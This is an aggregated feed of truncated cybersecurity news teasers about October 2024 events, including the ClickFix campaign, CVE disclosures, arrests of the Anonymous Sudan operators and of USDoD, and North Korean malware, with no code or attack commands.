Category: Attack Feeds

– [[{“value”:”Picture your company’s data as a vast, complex jigsaw puzzle—scattered across clouds, devices, and networks. Some pieces are hidden, some misplaced, and others might even be missing entirely. Keeping your data secure in today’s fast-evolving landscape can feel like an impossible challenge. But there’s a game-changing solution: Data Security Posture Management (DSPM). Think of it as a high-tech,”}]]  –...

– [[{“value”:”Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems. “This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems,” French cybersecurity company Sekoia said in”}]]  –...

– [[{“value”:”Microsoft has disclosed details about a now-patched security flaw in Apple’s Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user’s privacy preferences and access data. The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133. It was addressed by Apple as part of macOS Sequoia 15...

– North Korean hackers are infiltrating Western companies using fraudulent IT workers to steal sensitive data and extort ransom.…  – Read More  – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News 

– The app market is saturated with over 7 million apps across major stores. Analytics mobile apps have become…  – Read More  – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News 

– [[{“value”:”No-one would be bold enough to say that the ransomware problem is receding, but a newly-published report by Microsoft does deliver a slither of encouraging news amongst the gloom. And boy do we need some good news – amid reports that 389 US-based healthcare institutions were hit by ransomware last year – more than one every single day. Read...

– [[{“value”:” A 25-year-old Alabama man has been arrested and charged with hacking into the Securities and Exchange Commission’s Twitter/X account earlier this year and making fake regulatory posts that artificially inflated the price of Bitcoin by more than $1,000 per unit. Eric Council Jr., a resident of Athens, Ala., was arrested Thursday morning and charged with aggravated identity theft...

– New innovations and top-requested features.  – Read More  – Sophos News 

– Protect yourself from the ClickFix attack! Learn how cybercriminals are using fake Google Meet pages to trick users…  – Read More  – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News 

– [[{“value”:”The Russian threat actor known as RomCom has been linked to a new wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since at least late 2023. The intrusions are characterized by the use of a variant of the RomCom RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0), said Cisco Talos, which is monitoring the...

– [[{“value”:” The Federal Police of Brazil on Wednesday arrested a person allegedly responsible for a series of audacious data breaches targeting large international companies and U.S. government entities.  The suspect, who is known in the cybercrime underground as USDoD or EquationCorp, is allegedly the person responsible for a breach of the online background check and fraud prevention service National...

– [[{“value”:”Cybersecurity researchers have gleaned additional insights into a nascent ransomware-as-a-service (RaaS) called Cicada3301 after successfully gaining access to the group’s affiliate panel on the dark web. Singapore-headquartered Group-IB said it contacted the threat actor behind the Cicada3301 persona on the RAMP cybercrime forum via the Tox messaging service after the latter put out an”}]]  – Read More  – The...

– [[{“value”:” The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers. The younger brother is facing charges that could land him life in...

– [[{“value”:”An advanced persistent threat (APT) actor with suspected ties to India has sprung forth with a flurry of attacks against high-profile entities and strategic infrastructures in the Middle East and Africa. The activity has been attributed to a group tracked as SideWinder, which is also known as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04. “”}]] ...

– As technology adoption has shifted to be employee-led, just in time, and from any location or device, IT and security teams have found themselves contending with an ever-sprawling SaaS attack surface, much of which is often unknown or unmanaged. This greatly increases the risk of identity-based threats, and according to a recent report from CrowdStrike, 80% of breaches today...

– [[{“value”:”Federal prosecutors in the U.S. have charged two Sudanese brothers with running a distributed denial-of-service (DDoS) botnet for hire that conducted a record 35,000 DDoS attacks in a single year, including those that targeted Microsoft’s services in June 2023. The attacks, which were facilitated by Anonymous Sudan’s “powerful DDoS tool,” singled out critical infrastructure, corporate networks,”}]]  – Read More ...

– [[{“value”:”A critical security flaw has been disclosed in the Kubernetes Image Builder that, if successfully exploited, could be abused to gain root access under certain circumstances. The vulnerability, tracked as CVE-2024-9486 (CVSS score: 9.8), has been addressed in version 0.1.38. The project maintainers acknowledged Nicolai Rybnikar for discovering and reporting the vulnerability. “A security issue”}]]  – Read More  –...

– Brazilian police have arrested the hacker known as USDoD, responsible for high-profile breaches including the FBI’s InfraGard and…  – Read More  – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News 

– [[{“value”:”WordPress’s emperor, Matt Mullenweg, demands a hefty tribute from WP Engine, and a battle erupts, leaving millions of websites hanging in the balance. Meanwhile, the Internet Archive, a digital library preserving our online history, is under siege from hackers. All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley...

– [[{“value”:” If your remote employee insists on using their own devices, won’t show up on webcam and frequently changes their payment services, you may have accidentally hired a North Korean operative. Those are some of the tactics wielded by the actors behind what Secureworks refers to as Nickel Tapestry, a group known for planting fake IT workers at Western...

– The US DoJ indicts two Sudanese nationals allegedly behind Anonymous Sudan for over 35,000 DDoS attacks targeting critical…  – Read More  – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News 

– North Korean hackers target Linux-based payment switches with new FASTCash malware, enabling ATM cashouts. Secure your financial infrastructure…  – Read More  – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News 

– [[{“value”:” A federal grand jury unsealed an indictment Wednesday against two Sudanese brothers allegedly behind Anonymous Sudan, a cybercriminal outfit responsible for tens of thousands of attacks designed to knock websites and services offline. Authorities also unsealed a criminal complaint and announced they had disabled the group’s powerful tool for conducting attacks. Ahmed Salah Yousif Omer, 22, and Alaa...

– [[{“value”:” GitHub’s latest Enterprise Server update fixes a critical vulnerability that allows authentication bypass for on-premise deployments, according to the company. The bug — CVE-2024-9487 — impacts GitHub’s enterprise product and does not affect its software-as-a-service products, according to the company’s release. The Microsoft-owned company said the bug, which is a 9.5 on the CVSS scale, would allow hackers...

– Discover DVa, a new tool that detects and removes malware exploiting accessibility features on Android devices. Learn how…  – Read More  – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News 

– [[{“value”:” Iranian hackers are aggressively trying to crack passwords in the health care, government, information technology, energy and engineering sectors, an advisory from U.S., Canadian and Australian cyber agencies said Wednesday. The “brute force” attacks — which take a variety of forms — date to October of last year, according to the FBI, the Cybersecurity and Infrastructure Security Agency,...

– [[{“value”:”Threat actors are attempting to abuse the open-source EDRSilencer tool as part of efforts to tamper endpoint detection and response (EDR) solutions and hide malicious activity. Trend Micro said it detected “threat actors attempting to integrate EDRSilencer in their attacks, repurposing it as a means of evading detection.” EDRSilencer, inspired by the NightHawk FireBlock tool from MDSec, is”}]]  –...

– [[{“value”:” Latino and Hispanic voters are viewed as a critical, up-for-grabs bloc this election cycle, with Republican Donald Trump showing signs of making significant inroads with the groups in polling and advisers to Democrat Kamala Harris singling out those votes as key to winning battleground states like Florida, Nevada, Arizona and Pennsylvania. These voters were bombarded with Spanish-speaking mis-...

– [[{“value”:” Hackers are evading natural language processing detection capabilities used to filter out phishing attacks by adding benign text and links, according to data from Egress’ threat intelligence unit released Tuesday. Egress researchers looked at 40 attacks targeting U.S. organizations that used obfuscation techniques designed to evade anti-phishing services by using natural language processors (NLP) to send malware or...

– [[{“value”:”The FIDO Alliance said it’s working to make passkeys and other credentials more easier to export across different providers and improve credential provider interoperability, as more than 12 billion online accounts become accessible with the passwordless sign-in method. To that end, the alliance said it has published a draft for a new set of specifications for secure credential exchange,”}]] ...

– Attackers leverage QR codes in PDF email attachments to spearphish corporate credentials from mobile devices  – Read More  – Sophos News 

– [[{“value”:”The North Korean threat actor known as ScarCruft has been linked to the zero-day exploitation of a now-patched security flaw in Windows to infect devices with malware known as RokRAT. The vulnerability in question is CVE-2024-38178 (CVSS score: 7.5), a memory corruption bug in the Scripting Engine that could result in remote code execution when using the Edge browser...

– [[{“value”:”AI from the attacker’s perspective: See how cybercriminals are leveraging AI and exploiting its vulnerabilities to compromise systems, users, and even other AI applications Cybercriminals and AI: The Reality vs. Hype “AI will not replace humans in the near future. But humans who know how to use AI are going to replace those humans who don’t know how to...

– [[{“value”:”To defend your organization against cyber threats, you need a clear picture of the current threat landscape. This means constantly expanding your knowledge about new and ongoing threats. There are many techniques analysts can use to collect crucial cyber threat intelligence. Let’s consider five that can greatly improve your threat investigations. Pivoting on С2 IP addresses to pinpoint malware”}]] ...

– [[{“value”:”A new spear-phishing campaign targeting Brazil has been found delivering a banking malware called Astaroth (aka Guildma) by making use of obfuscated JavaScript to slip past security guardrails. “The spear-phishing campaign’s impact has targeted various industries, with manufacturing companies, retail firms, and government agencies being the most affected,” Trend Micro said in a new analysis. “”}]]  – Read More ...

– [[{“value”:”The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting SolarWinds Web Help Desk (WHD) software to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2024-28987 (CVSS score: 9.1), the vulnerability relates to a case of hard-coded credentials that could be abused to gain”}]]  – Read More  –...

– [[{“value”:”GitHub has released security updates for Enterprise Server (GHES) to address multiple issues, including a critical bug that could allow unauthorized access to an instance. The vulnerability, tracked as CVE-2024-9487, carries a CVS score of 9.5 out of a maximum of 10.0 “An attacker could bypass SAML single sign-on (SSO) authentication with the optional encrypted assertions feature, allowing”}]]  –...

– Finnish Customs and Swedish Police, with Bitdefender’s support, shut down dark web marketplaces Sipulitie and Tsätti. These platforms…  – Read More  – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News 

– ESET Research found the Telekopye scam network targeting Booking.com and Airbnb. Scammers use phishing pages via compromised accounts…  – Read More  – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News 

– [[{“value”:”New variants of an Android banking trojan called TrickMo have been found to harbor previously undocumented features to steal a device’s unlock pattern or PIN. “This new addition enables the threat actor to operate on the device even while it is locked,” Zimperium security researcher Aazim Yaswant said in an analysis published last week. First spotted in the wild...

– [[{“value”:”North Korean threat actors have been observed using a Linux variant of a known malware family called FASTCash to steal funds as part of a financially-motivated campaign. The malware is “installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs,” a security researcher who goes by...

– [[{“value”:”Cybersecurity researchers have disclosed a new malware campaign that leverages a malware loader named PureCrypter to deliver a commodity remote access trojan (RAT) called DarkVision RAT. The activity, observed by Zscaler ThreatLabz in July 2024, involves a multi-stage process to deliver the RAT payload. “DarkVision RAT communicates with its command-and-control (C2) server using a custom network”}]]  – Read More ...

– [[{“value”:”In episode 20 of “The AI Fix”, Mark asks an AI to make a very important decision, the Nobel academy finds a bandwagon, Graham gets a new nickname, a pair of robots prove that AI can’t do humour, and our hosts find out why emotional support insects haven’t taken off. Graham introduces Mark to Optimus, the robot that can’t...

– [[{“value”:” The number of ransomware attacks that reach the encryption stage dropped 300% over the past two years, due in large part to automatic attack disruption technologies, according to a report out Tuesday from Microsoft.  The findings — which come as part of Microsoft’s fifth annual Digital Defense Report analyzing trends between June 2022 and July 2023 — come amid...

– In recent years, the number and sophistication of zero-day vulnerabilities have surged, posing a critical threat to organizations of all sizes. A zero-day vulnerability is a security flaw in software that is unknown to the vendor and remains unpatched at the time of discovery. Attackers exploit these flaws before any defensive measures can be implemented, making zero-days a potent...

– [[{“value”:” Large organizations that train developers with secure-by-design practices can reliably reduce the number of vulnerabilities introduced into software products by more than 50%, according to a new report from Secure Code Warrior. The Australia-based secure coding platform and software firm analyzed data from 600 enterprise customers over nine years to find out what improvements, if any, can be...